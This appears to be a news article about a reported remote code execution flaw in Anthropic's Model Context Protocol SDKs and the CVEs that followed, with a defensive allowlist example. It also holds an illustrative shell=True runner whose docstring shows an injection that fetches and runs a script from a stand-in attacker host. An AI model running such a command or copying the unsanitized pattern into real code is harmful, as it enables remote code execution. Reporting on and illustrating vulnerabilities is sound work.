
Anthropic's Model Context Protocol includes a critical remote code execution vulnerability — newly discovered exploit puts 200,000 AI servers at risk

Why This Matters

The discovery of a remote code execution vulnerability in Anthropic's Model Context Protocol (MCP) highlights significant security risks for the AI industry, especially given MCP's widespread adoption across major platforms and tools. Anthropic's decision not to patch raises hard questions about who owns security in an open standard, and the flaw's reach extends to as many as 200,000 AI servers and the users behind them. The incident underscores the need for rigorous security practices in AI infrastructure development to protect against malicious exploits.

Key Takeaways

Security researchers at OX Security have exposed an architectural vulnerability in Anthropic's Model Context Protocol (MCP) that enables arbitrary remote code execution on any system running a vulnerable implementation. The flaw affects MCP's official SDKs across Python, TypeScript, Java, and Rust, and ripples through a supply chain spanning more than 150 million downloads and up to 200,000 server instances. Surprisingly, Anthropic declined to patch the protocol in response, telling researchers the behavior was "expected."

MCP is the open standard Anthropic created in late 2024 to let AI models connect to external tools, databases, and APIs. It was donated to the Linux Foundation's Agentic AI Foundation last December and has since been adopted by OpenAI, Google, and most major AI coding tools.

The vulnerability is in how MCP handles local process execution over its STDIO transport interface. User-controlled input can flow directly into command execution without sanitization — a design choice baked into the reference SDKs — meaning that every developer building on MCP inherits the exposure by default.
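The failure mode described above can be illustrated with a short, hypothetical Python sketch. This is not the MCP SDK's actual code; the function name and example commands are invented for illustration. The point is that once user-controlled text reaches a shell unfiltered, metacharacters such as `;` let an attacker chain arbitrary commands:

```python
import subprocess

def run_tool(user_supplied: str) -> str:
    """Hypothetical tool runner: passes user input straight to a shell.

    This mirrors the unsanitized-input pattern described in the article,
    NOT actual MCP SDK code. With shell=True, metacharacters like ';'
    are interpreted, so an input such as "ls; curl attacker.example | sh"
    executes the attacker's command as well.
    """
    result = subprocess.run(user_supplied, shell=True,
                            capture_output=True, text=True)
    return result.stdout
```

Any server or tool that forwards model- or user-supplied strings into a helper like this inherits the exposure, which is why a flaw baked into the reference SDKs propagates through the whole downstream ecosystem.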


OX Security's research team identified four families of exploitation: unauthenticated UI injection in AI frameworks; hardening bypasses in tools such as Flowise that were supposed to be protected; zero-click prompt injection in AI coding IDEs, including Windsurf and Cursor; and malicious package distribution through MCP marketplaces. The researchers successfully poisoned nine of 11 MCP registries with a test payload and confirmed command execution on six live production platforms with paying customers.

The research produced at least 10 CVEs rated high or critical. LiteLLM (CVE-2026-30623) and Bisheng (CVE-2026-33224) have been patched, while Windsurf (CVE-2026-30615), which allowed zero-click local code execution, remains in a "reported" state alongside flaws in GPT Researcher, Agent Zero, LangChain-Chatchat, and DocsGPT.

OX Security said it repeatedly recommended protocol-level fixes to Anthropic, such as manifest-only execution or a command allowlist in the SDKs, either of which would have protected downstream users immediately. Anthropic reportedly declined, and did not object when the researchers said they intended to publish their report.
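A command allowlist of the kind reportedly proposed could look roughly like the following Python sketch. The allowlist contents and function name are illustrative assumptions, not the researchers' actual proposal: input is tokenized without shell interpretation, and the executable must appear on an explicit allowlist before anything runs.

```python
import shlex
import subprocess

# Hypothetical allowlist; a real deployment would enumerate only the
# executables a given MCP server legitimately needs.
ALLOWED_COMMANDS = {"echo", "ls", "cat"}

def run_tool_allowlisted(command_line: str) -> str:
    # shlex.split tokenizes without invoking a shell, so ';', '|', and
    # '&&' become literal argument text, not command separators.
    argv = shlex.split(command_line)
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        raise PermissionError(f"command not allowed: {argv[:1]}")
    # No shell=True: argv[0] is executed directly with literal arguments.
    result = subprocess.run(argv, capture_output=True, text=True)
    return result.stdout
```

With this guard, an input like `"echo safe; echo INJECTED"` is passed to a single `echo` call as literal text rather than executing a second command, and any executable not on the allowlist is rejected outright.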

The disclosure comes less than a week after Anthropic launched Claude Mythos, a frontier model it is positioning as a tool for finding security vulnerabilities in other organizations' software. The irony wasn't lost on OX's researchers, who called the findings "a call to action" for Anthropic to apply that same commitment to its own infrastructure.


It also follows the accidental leak of Claude Code's full source code through a public npm package at the end of March, which exposed roughly 500,000 lines of unobfuscated TypeScript before Anthropic pulled the file.
